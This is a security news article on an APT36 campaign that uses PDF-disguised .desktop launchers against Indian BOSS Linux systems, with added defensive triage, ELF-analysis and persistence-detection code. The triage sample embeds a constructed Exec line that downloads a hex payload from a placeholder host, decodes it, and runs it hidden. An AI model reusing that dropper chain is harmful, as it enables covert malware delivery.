APT36 Hackers Attacking Indian BOSS Linux Systems With Weaponized .desktop Shortcut Files

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

In early August 2025, security researchers uncovered a campaign targeting India’s BOSS (Bharat Operating System Solutions) Linux installations through seemingly innocuous shortcut files.

These files masquerade as PDF documents but are .desktop entries, the freedesktop launcher format used by Linux desktop environments. A file manager shows the entry’s Name= and Icon= values rather than the real file name, and the Exec= key holds an arbitrary command line that runs when the entry is opened; that is what turns a double-click on a “PDF” into payload delivery and execution. Recent GNOME and KDE releases refuse to launch a .desktop entry that is not marked executable or explicitly trusted, so an analyst handling such a lure should check which permission bits the archive restores on extraction.

Initial access is gained via spear-phishing emails containing a ZIP archive named “Meeting_Notice_Ltr_ID1543ops.pdf_.zip.”

When extracted, this archive presents a file labeled Meeting_Ltr_ID1543ops.pdf.desktop, which, upon execution, silently downloads and deploys an ELF payload tailored for x86-64 systems.

Cyfirma analysts identified that the .desktop shortcut contains an embedded bash command that generates a timestamped temporary file under /tmp, retrieves a hex-encoded payload from a remote server via curl, converts it to binary with xxd, and then assigns execution permissions before launching it in the background.

To maintain the illusion of legitimacy, the script concurrently opens a benign PDF hosted on Google Drive in Firefox, deflecting user suspicion.
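A triage routine for lures of this shape, added here as an example (it is not Cyfirma’s code and not the sample itself). It parses a .desktop entry, checks whether the file name and Name= value impersonate a document, and looks in the Exec= line for the download, decode, chmod, background-launch and decoy-open steps described above. The embedded .desktop text is constructed to match that description; the download host payload.example.invalid and the Drive link are placeholders, not the campaign’s real infrastructure.

```python
import configparser
import re

# Constructed sample modelled on the Exec chain described in the article. The
# download host (payload.example.invalid) and the Drive link are hypothetical
# placeholders, not the campaign's real infrastructure. `%%` is the .desktop
# escape for a literal percent sign, so the launcher hands bash `date +%s`.
SAMPLE_FILENAME = "Meeting_Ltr_ID1543ops.pdf.desktop"
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=Meeting_Ltr_ID1543ops.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c 'f=/tmp/.mt_$(date +%%s); curl -s -o $f.txt https://payload.example.invalid/Mt_dated_29.txt; xxd -r -p $f.txt > $f; chmod +x $f; nohup $f >/dev/null 2>&1 & firefox https://drive.google.com/file/d/EXAMPLE/view'
"""

# Indicators of the download -> decode -> mark executable -> run-in-background chain.
INDICATORS = {
    "downloader": re.compile(r"\b(curl|wget)\b"),
    "hex_or_b64_decode": re.compile(r"\bxxd\s+-r\b|\bbase64\s+(-d|--decode)\b"),
    "drops_in_tmp": re.compile(r"/(tmp|var/tmp|dev/shm)/"),
    "marks_executable": re.compile(r"\bchmod\s+(\+x|[0-7]*[1357])\b"),
    # nohup/setsid, or a lone '&' that is not part of '&&' or '2>&1'
    "backgrounds_process": re.compile(r"\bnohup\b|\bsetsid\b|(?<![&>|])&(?!&)"),
    "opens_decoy_document": re.compile(
        r"\b(firefox|xdg-open|chromium|evince)\b[^;|&]*\bdrive\.google\.com"),
}


def parse_desktop(text):
    """Read a freedesktop .desktop entry (INI-style) into a dict of its keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # .desktop keys are case-sensitive
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def triage_desktop(filename, text):
    """Return a verdict and the indicators found in one .desktop file."""
    entry = parse_desktop(text)
    exec_line = entry.get("Exec", "")
    findings = []
    # Disguise checks: a document extension in front of .desktop, and a
    # display name that ends in a document extension.
    if re.search(r"\.(pdf|docx?|xlsx?|pptx?)\.desktop$", filename, re.I):
        findings.append("double_extension_disguise")
    if re.search(r"\.(pdf|docx?|xlsx?|pptx?)$", entry.get("Name", ""), re.I):
        findings.append("display_name_mimics_document")
    for label, rx in INDICATORS.items():
        if rx.search(exec_line):
            findings.append(label)
    # Fetch + decode + make executable is the dropper signature; anything
    # else only raises suspicion.
    chain = {"downloader", "hex_or_b64_decode", "marks_executable"}
    if chain <= set(findings):
        verdict = "malicious"
    elif len(findings) >= 3:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "findings": findings, "exec": exec_line}


if __name__ == "__main__":
    report = triage_desktop(SAMPLE_FILENAME, SAMPLE_DESKTOP)
    print(report["verdict"], report["findings"])
```

The same function can be pointed at every *.desktop extracted from a mail attachment; a benign launcher such as Firefox’s own entry produces no findings, while the constructed lure trips all eight.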

Paired with the group’s established Windows tooling, this Linux variant lets APT36 (also tracked as Transparent Tribe) pivot between Windows and Linux environments while targeting government infrastructure with considerable stealth.

The impact of this campaign is multifaceted: once active, the ELF binary establishes persistence through a systemd service and a cron job, exfiltrates sensitive data to a hardcoded command-and-control endpoint, modgovindia.space on port 4000, and communicates over that nonstandard port using obfuscated DNS-style queries.

Domain registrations such as securestore.cv and modgovindia.space, created in July 2025, have been flagged as malicious infrastructure supporting the campaign.

The rapid deployment of these domains and the tailored payloads underscores APT36’s evolving sophistication and strategic focus on India’s public sector.

Infection Mechanism

Delving deeper into the infection mechanism reveals a carefully orchestrated sequence of actions designed for both stealth and persistence.

The .desktop file’s Exec line encapsulates a single bash command. The file it retrieves, Mt_dated_29.txt, is the ELF payload as a plain hex dump; once decoded, the binary’s MD5 (5bfeeae3cc9386513dc7c301c61e67a7) matches a sample already on VirusTotal.

Meeting_Ltr_ID1543ops.pdf.desktop (Source – Cyfirma)

The payload’s ELF header identifies a statically linked 64-bit LSB executable with anomalous section headers, most likely intended to hinder static analysis: the kernel loader reads only the program headers, so a file with a bogus section table still runs, while readelf, objdump and most disassemblers trust those fields and fail to parse it cleanly.

ELF header snippet (Source – Cyfirma)
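The decode-and-inspect step for a payload delivered as a hex dump, covering both the Mt_dated_29.txt conversion described above and the ELF header observations, as an added example (not Cyfirma’s tooling). It reproduces what `xxd -r -p` does, parses the ELF64 header and program headers, decides static versus dynamic linking from the program headers alone, flags section-header fields that cannot be valid, and compares the MD5 against the hash the article reports. The hex dump is a constructed 120-byte stand-in (a header plus one PT_LOAD segment with deliberately bogus section fields), not the real sample, so its MD5 does not match the IOC.

```python
import hashlib
import re
import struct

# MD5 the article attributes to the decoded .elf payload (Cyfirma / VirusTotal).
KNOWN_MD5 = {"5bfeeae3cc9386513dc7c301c61e67a7"}

# Constructed stand-in for a hex-encoded payload file in the shape of
# Mt_dated_29.txt: an ELF64 header followed by one PT_LOAD program header,
# 120 bytes in all, with deliberately bogus section-header fields
# (e_shoff=0xdeadbeef, e_shnum=0, e_shstrndx=256). It is NOT the real
# sample, so its MD5 will not match the IOC above.
SAMPLE_HEX_DUMP = """
7f454c46020101000000000000000000
02003e00010000000010400000000000
4000000000000000efbeadde00000000
00000000400038000100400000000001
01000000050000000000000000000000
00004000000000000000400000000000
78000000000000007800000000000000
0010000000000000
"""

ELF64_EHDR = struct.Struct("<16sHHIQQQIHHHHHH")  # 64 bytes
ELF64_PHDR = struct.Struct("<IIQQQQQQ")          # 56 bytes
PT_DYNAMIC, PT_INTERP = 2, 3
SHN_XINDEX = 0xFFFF


def decode_hex_dump(text):
    """What `xxd -r -p` does: drop whitespace (and other non-hex noise), then decode."""
    return bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", text))


def analyse_elf(data):
    """Parse an ELF64 image; flag section-table fields that cannot be right."""
    result = {
        "is_elf": data[:4] == b"\x7fELF",
        "md5": hashlib.md5(data).hexdigest(),
        "anomalies": [],
    }
    result["known_ioc"] = result["md5"] in KNOWN_MD5
    if not result["is_elf"] or len(data) < ELF64_EHDR.size:
        return result
    result["class"] = {1: "ELF32", 2: "ELF64"}.get(data[4], "unknown")
    if result["class"] != "ELF64":
        return result  # only the 64-bit layout is parsed here
    (ident, e_type, e_machine, _ver, e_entry, e_phoff, e_shoff, _flags, _ehsize,
     e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx) = ELF64_EHDR.unpack_from(data)
    result["data"] = {1: "LSB", 2: "MSB"}.get(ident[5], "unknown")
    result["type"] = {2: "EXEC", 3: "DYN"}.get(e_type, hex(e_type))
    result["machine"] = {0x3E: "x86-64", 0xB7: "AArch64"}.get(e_machine, hex(e_machine))
    result["entry"] = hex(e_entry)

    # The kernel loader needs only the program headers, so that is where the
    # static-vs-dynamic question is answered: no PT_INTERP and no PT_DYNAMIC
    # means nothing is resolved at load time.
    p_types = []
    if e_phentsize == ELF64_PHDR.size and e_phoff + e_phnum * e_phentsize <= len(data):
        for i in range(e_phnum):
            p_types.append(ELF64_PHDR.unpack_from(data, e_phoff + i * e_phentsize)[0])
    else:
        result["anomalies"].append("program header table missing or truncated")
    result["statically_linked"] = bool(p_types) and not ({PT_INTERP, PT_DYNAMIC} & set(p_types))

    # Section headers are ignored by the loader but trusted by readelf/objdump
    # and most disassemblers, which is why bogus values here hinder analysis.
    if e_shoff and e_shoff >= len(data):
        result["anomalies"].append("e_shoff beyond end of file")
    if e_shnum and e_shentsize != 64:
        result["anomalies"].append("e_shentsize is not 64")
    if e_shnum and e_shoff + e_shnum * e_shentsize > len(data):
        result["anomalies"].append("section header table extends past end of file")
    if e_shstrndx not in (0, SHN_XINDEX) and e_shstrndx >= e_shnum:
        result["anomalies"].append("e_shstrndx out of range")
    return result


def analyse_hex_payload(text):
    """Decode a hex dump the way the dropper does, then analyse the binary."""
    return analyse_elf(decode_hex_dump(text))


if __name__ == "__main__":
    for key, value in analyse_hex_payload(SAMPLE_HEX_DUMP).items():
        print(f"{key}: {value}")
```

Run against a real Mt_dated_29.txt the MD5 comparison is the quick IOC match; the anomaly list is what tells you in advance that `readelf -S` output should not be trusted and that analysis should start from the program headers and entry point instead.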

Once decoded and launched, the payload installs a user-level systemd service named system-update.service, a name that mimics legitimate system units, and adds a crontab entry that runs .config/systemd/systemd-update at reboot.

Either entry relaunches the binary after a reboot without user interaction, and each survives removal of the other. For command and control the malware uses nonblocking UDP sockets driven by epoll to exchange DNS-based messages with modgovindia.space, handling both command retrieval and data exfiltration.
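A host-side check for the two persistence mechanisms just described, written as an added example (not Cyfirma’s code). It scans crontab text for entries that execute from hidden or scratch directories and inspects a systemd unit for an ExecStart in such a location or for a user-level unit whose name imitates a system component. The crontab lines, the unit path under ~/.config/systemd/user/ and the unit body are constructed to match the article’s description, not copied from the sample.

```python
import configparser
import re

# Constructed inputs modelled on the persistence the article describes: a user
# crontab with an @reboot entry and a user-level unit whose ExecStart points at
# a binary hidden under ~/.config/systemd/. Neither is the real sample's text.
SAMPLE_CRONTAB = """# m h dom mon dow command
MAILTO=""
0 3 * * * /usr/bin/updatedb
@reboot .config/systemd/systemd-update
"""

SAMPLE_UNIT_PATH = "/home/user/.config/systemd/user/system-update.service"
SAMPLE_UNIT = """[Unit]
Description=System Update Service

[Service]
ExecStart=/home/user/.config/systemd/systemd-update
Restart=always

[Install]
WantedBy=default.target
"""

# Locations a legitimate unit or cron job should not need to execute from:
# any hidden directory component, or the scratch directories.
HIDDEN_OR_SCRATCH = re.compile(r"(^|/)\.[^/]+/|^/?(tmp|var/tmp|dev/shm)/")
# Unit names that borrow the look of real system components.
SYSTEM_LOOKALIKE = re.compile(r"^(system|systemd|dbus|udev|kernel)[-_.]", re.I)


def find_cron_persistence(crontab_text):
    """Return crontab entries that run a command from a hidden or scratch directory."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue  # blank, comment, or environment assignment
        if line.startswith("@"):  # @reboot, @hourly, ...
            schedule, _, command = line.partition(" ")
        else:  # five time fields, then the command
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue
            schedule, command = " ".join(fields[:5]), fields[5]
        if HIDDEN_OR_SCRATCH.search(command):
            findings.append({"source": "crontab", "schedule": schedule, "command": command,
                             "reason": "runs from hidden or scratch directory"})
    return findings


def find_unit_persistence(unit_path, unit_text):
    """Return findings for a systemd unit whose ExecStart or name looks like an implant."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str  # unit keys are case-sensitive
    cp.read_string(unit_text)
    # Strip systemd's ExecStart prefix characters (-, @, :, +, !) before matching.
    exec_start = cp.get("Service", "ExecStart", fallback="").lstrip("-@:+!")
    unit_name = unit_path.rsplit("/", 1)[-1]
    user_unit = "/.config/systemd/user/" in unit_path
    findings = []
    if HIDDEN_OR_SCRATCH.search(exec_start):
        findings.append({"source": unit_name, "command": exec_start,
                         "reason": "ExecStart in hidden or scratch directory"})
    if user_unit and SYSTEM_LOOKALIKE.match(unit_name):
        findings.append({"source": unit_name, "command": exec_start,
                         "reason": "user unit named like a system component"})
    return findings


if __name__ == "__main__":
    for f in find_cron_persistence(SAMPLE_CRONTAB) + find_unit_persistence(SAMPLE_UNIT_PATH, SAMPLE_UNIT):
        print(f)
```

On a live host the inputs come from `crontab -l` for each user and from the files under ~/.config/systemd/user/ (`systemctl --user list-unit-files` lists them); the two checks are deliberately independent because the article’s implant installs both and cleaning only one leaves it in place.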

The layered approach, from social engineering and obfuscation to redundant persistence and covert DNS-based communications, shows mature tradecraft. Defenders in sensitive government environments should treat .desktop files inside mail attachments and archives as executables at the gateway, restrict what can run from /tmp and home directories through application whitelisting, and monitor endpoints for new user-level systemd units, @reboot cron entries, and unexpected outbound connections on port 4000 or anomalous DNS query volumes.
